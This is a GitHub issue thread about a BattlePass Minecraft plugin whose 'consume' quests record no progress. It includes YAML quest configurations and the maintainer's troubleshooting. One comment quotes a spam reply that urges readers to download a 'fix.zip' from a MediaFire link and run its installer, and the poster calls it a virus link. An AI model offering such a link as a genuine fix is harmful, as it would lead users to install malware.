### ISSUE TITLE
Consume Action type don't work

### ISSUE THREAD

**Issue by ISN-Bulma** [GC-spigot/battle-pass#589] opened 2024-08-23 13:12 UTC
### Describe the bug

When testing our quests that have the action type consume, it does not give any progress.
I have tried several different food types to see if it's the material name that is the issue, but with no luck.
And we do not have any plugins that interfere with the eating event in the game.

### How to reproduce

This is our quest:
'10':
    name: Week 3 - Healer II
    type: consume
    variable: enchanted_golden_apple
    required-progress: 64
    points: 10
    item:
      material: enchanted_golden_apple:0
      name: '&6&lHealer II'
      lore:
      - '&7Consume 64 enchanted golden apples'
      - ''

But i have also tried:

  '10':
    name: Week 3 - Healer II
    type: consume
    variable: cooked_beef:0
    required-progress: 64
    points: 10
    item:
      material: cooked_beef:0
      name: '&6&lHealer II'
      lore:
      - '&7Consume 64 cooked beef'
      - ''
      - '&7Progress &e%total_progress%&7/&e%required_progress%'
      
      And still no progress.

### Screenshots / Videos

https://gyazo.com/09f2d16f0c426297970caf1c5bdae215

**Comment by ISN-Bulma** [comment] 2024-08-23 13:28
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

This is obviously a virus link.

**Comment by KPGTB** [comment] 2024-08-23 20:23
Hey! I can't reproduce your problem. Which version of BattlePass do you use?

**Comment by Celipa** [comment] 2024-08-31 08:06
> Hey! I can't reproduce your problem. Which version of BattlePass do you use?

Newest, i update it everytime and update releases.

**Comment by KPGTB** [comment] 2024-08-31 18:19
Okay, so instead of using `cooked_beef:0`, you should use `cooked_beef`, but enchanted golden apples should work.

**Comment by ISN-Bulma** [comment] 2024-09-01 13:56
Okay so after updating to newest version cooked_beef now works. I had tried `cooked_beef` instead of` cooked_beef:0` but it had no change.
And when it comes to the apples, it turns out that deluxe combat's custom apple effects were blocking the process. 
What does the progress track when it comes to golden apples? Does it track the item or the effects it gives the player?

**Comment by KPGTB** [comment] 2024-09-01 16:50
Consume action checks "material" name

**Comment by Celipa** [comment] 2024-09-02 10:51
Isnt it weird then how it doesnt detect gapples just cause they have other effects?
The material stay the same after all :P

**Comment by KPGTB** [comment] 2024-09-04 18:45
Maybe author of deluxe combat plugin made something in consume event what causes compatibility issues with our plugin.

I see that the problem with general food has been solved, so I am closing this issue

**Closed by KPGTB** 2024-09-04 18:45 UTC
Labels: Bug: Unconfirmed, Bug: Can't Reproduce, Status: Awaiting Response
